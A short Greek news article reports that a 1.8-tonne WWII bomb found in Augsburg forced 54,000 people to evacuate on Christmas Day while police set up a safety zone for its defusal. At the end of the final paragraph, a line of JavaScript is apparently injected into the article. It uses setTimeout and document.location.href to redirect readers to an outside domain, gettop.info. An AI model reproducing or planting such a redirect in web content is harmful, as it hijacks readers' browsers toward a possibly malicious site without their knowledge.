Βόμβα από τον Β’ Παγκόσμιο Πόλεμο στη νότια Γερμανία – Απομακρύνονται 54.000 άτομα από τις οικίες τους

0
7

 

Βρετανική βόμβα από τον Β’ Παγκόσμιο Πόλεμο εντοπίστηκε ανήμερα τα Χριστούγεννα, στο Άουγκσμπουργκ της νότιας Γερμανίας, με αποτέλεσμα 54.000 άνθρωποι να αναγκαστούν να απομακρυνθούν από τις οικίες τους.

Στην επιχείρηση εκκένωσηςπου ξεκίνησε από το πρωί συμμετέχουν περίπου 900 αστυνομικοί. Η βόμβα, βάρους 1,8 τόνων, βρέθηκε στις 20 Δεκεμβρίου κατά τη διάρκεια έργων στο κέντρο της βαυαρικής πόλης, που βρίσκεται στα βορειοδυτικά του Μονάχου.

Οι αρχές του Άουγκσμπουργκ καθόρισαν μια ζώνη ασφαλείας διαμέτρου 1.500 μέτρων γύρω από το σημείο όπου εντοπίστηκε η βόμβα η οποία πρόκειται να εξουδετερωθεί σήμερα το απόγευμα.

Η εξουδετέρωση της βόμβας μπορεί να διαρκέσει ακόμη και 5 ώρες, προειδοποίησαν οι Αρχές σημειώνοντας ότι οι κάτοικοι δεν θα μπορέσουν να επιστρέψουν στα σπίτια τους πριν πέσει η νύχτα.

Μολονότι έχουν περάσει περισσότερα από 70 χρόνια από το τέλος του πολέμου, στη Γερμανία εντοπίζονται ακόμη βόμβες. Μόνο στο Βερολίνο εκτιμάται ότι υπάρχουν ακόμη 3.000 βόμβες. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here